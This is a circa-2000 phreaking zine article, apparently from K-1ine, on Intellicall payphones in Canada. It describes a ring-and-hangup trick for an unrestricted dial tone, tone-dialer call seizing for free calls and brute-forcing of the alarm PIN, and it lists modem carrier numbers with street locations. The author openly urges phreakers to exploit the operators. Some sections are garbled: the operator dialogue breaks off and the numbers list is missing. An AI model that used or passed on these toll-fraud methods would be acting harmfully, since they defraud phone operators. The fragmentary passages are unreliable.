http://www.payphone-directory.org/sounds/wav/web/intavoice.wav
http://www.payphone-directory.org/sounds/wav/web/a.wav
http://www.payphone-directory.org/sounds/wav/web/intring.wav

Payphones and Accessories
-------------------------

http://www.universal-comm.net/intell.htm


Intellicall Locations
---------------------

 Restaurants - Truck Stops - Schools - Service Stations - Churches -
    Airports - Bowling Alleys - Night Clubs - Bingo Parlors - Resorts -
   Low-income Housing - Convenience Stores - Apartments - Bars - Lounges
                             - Hotels - Motels 

Features
--------

[On UltraTel Models]

- After approximately five rings, a modem carrier will pick up

- Some models of this phone have a scrambled keypad, that is, 
  when you dial a number, the tones you hear don't match the 
  numbers you push. After a call is completed, the scrambling ends.

- This phone requires an AC power source to function properly.

- During a call, it will take your money as soon as it thinks
  the call is answered. If it is left off the hook too long it will say:
  "Please hang up and try again."


[On AstraTel Models]

- After approximately five rings, a modem carrier will pick up

- It has a 14,400 baud modem, which is very fast for a pay phone. 
  It runs only on phone line power. If you don't deposit enough for a call,
  you will be told to just deposit the difference.

- If you leave this phone off hook too long it will generate a fake fast 
  busy signal.


Special Features
----------------

Toll Fraud Prevention --

The fraud prevention is this: if you call your friend on an Intellicall
phone (UltraTel & AstraTel models) and your friend answers, the phone will 
automatically dial '111'. If you were to call this phone from either the 
payphone next to it or from a cellphone; have it ring once, pick it up and 
then hang up, and pick it up again you'd get an unrestricted dial tone which 
would allow you to use a tone dialer (since the keypad is temporarily disabled)
to make free local calls.

The auto-111 DTMF tones override the dialtone, thus preventing toll-fraud.


Security Issues
---------------

- Internal Alarm Bruteforcing -

Internal Alarm Bruteforcing can be done by firstly entering pound then
a four digit PIN. Because of previous problems involving the disclosure 
of alarm codes, I will not be posting it in this article. 

Too many people were abusing the #CPC code that was mentioned on the 
'Complete Guide to the Elcotel Payphone', and because of that Canada Payphone
changed the PIN and set up a trap (at least in Edmonton) which automatically 
caused the phone to dial out for help. 

If you wish to bruteforce the PIN then all the power to you. 


'Phone Seizing Problems - will give free phone calls'

Well whaddya know, the very same exploit I discovered on the Elcotel 9520C 
model payphones works on the Intellicall model payphones as well. 
When will these payphone developers and their distributors ever take their
security seriously? The answer is; until the specific fraud being committed 
has reached such prevalent levels that the chance of a yearly revenue is slim 
to none.

Using a twenty dollar Genexxa 33-Number Memory Pocket Tone Dialer from Radio 
Shack, one can easily take advantage of Paytel's incompetence in relation
to call seizing.


 -- Typical Scenario --

 CALL TO PAYTEL CANADA

Operator: Paytel Canada, how may I help you?
Phantom Phreak: Yes, may I have the number for directory assistance?
Operator: Just a moment...
Phantom Phreak: Thank-you.
Operator: 1-877-542-2010
Phantom Phreak: No no no, thank-you!

  play his pre-programmed 7 digit DTMF tones into the receiver allowing him
  a free local call. *

 
Useful Numbers:

The keypad isn't disabled when using these local numbers, 
meaning you will not need to go through the trouble of using a tone-dialer:



| see: 'SKANNING' at www.nettwerked.net for a listing of thousands of these: |


  line after several unsuccessful login attempts (not recommended)


Modem Carrier Numbers (AstraTel 2):

519-576-0354 - Kitchener, Ontario, Canada
780-483-9783 - Edmonton, Alberta, Canada
780-456-9983 - 127St/139Ave: Edmonton, Alberta, Canada
905-453-9794 - Halifax, Nova Scotia, Canada (corner of Robie and Young streets)



			  'Resources'


Resources list - 

URL's of web-sites that helped me with the R&D for this document:

-+ GHU - The Grasshopper Unit: http://internettrash.com/users/mtghu/
-+ Intellicall Inc: http://www.intellicall.com/
-+ Pay Phone Directory: http://www.payphone-directory.org
-+ PayTel Canada: http://www.paytelcanada.com/ 
-+ Protel Inc: http://protelinc.com
-+ Protel Inc (ftp): ftp://protelinc.com 
-+ Tatung Telecom: http://www.tatungtel.com/ 



  	 	           'Conclusion' 

I'd firstly like to thank some people who helped directly and indirectly
with the creation of this document: Cyber Thief, Magma, Miklos, and RT.

Secondly: 

Oh you big scary Telecom companies popping up everywhere trying to make
a buck (or should I say 'quarter') off the slowly dying payphone industry
in Canada, without ever paying attention to security. I'm not going to
chant about how you guys should INCREASE your security. See that's just
something honest 'white hat' folks do. The more you make it easier for the
Canadian phreakers to exploit you physically and remotely, the better.
Although I don't mind a challenge every now and again... or do I? 
All this STUFF just comes so easily to me... tee-hee.

Def Con 8:

 YES! Hack Canada and several of their Canadian friends will be attending
Def Con 8 this year for some good 'ol fashion fun! This will be Hack Canada's
second year attending this crazy Las Vegas conference, and we plan on having 
a few surprises for all you people. Look for a lot more pictures and
reviews this year - hell just look for us and share your beer, eh. 

PeAcE OuT...

_ Contact me _

E-mail: theclone@nettwerked.net
ICQ: 79198218
IRC: haxordogs.net [#haxordogs, #nettwerked]
URL - http://www.nettwerked.net	


Shouts:

Hack Canada & Haxordogs


			    	  A 
			 P R E - D E F C O N 
			       2 0 0 0
			     R E L E A S E


---


Credits:

  I would like to give credit to the following people for helping with this
issue of K-1ine - if it wasn't for you guys I don't think this issue would have
			   been released.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	4ncifer, Eric Knight, Magma/Miklos, PsychoSpy, Untoward, 
			and lastly to Wargames
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanks you guys, seriously. I'm very happy to see all the contributions.

Remember: Articles are ALWAYS welcomed. If you have something you'd like to 
see on this zine, feel free to send me an e-mail. Even if you're worried
that the article is "lame" or "isn't technical" or something like that,
			    send it anyways. 

Remember: everyone has something to offer to the scene. Show your support.

--


Shouts:

  Hack Canada (www.hackcanada.com) and Haxordogs (www.haxordogs.net), 
k-rad-bob @ b0g (www.b0g.org), #2600ca crew, Ottawa 2600; mainly Kybo_Ren, RT,
The Non-Existent Crew, lastly to everyone and anyone who gives a shit
			about the Canadian H/P scene.

			

				     A
			     N E T T W E R K E D
			        P R O D U C T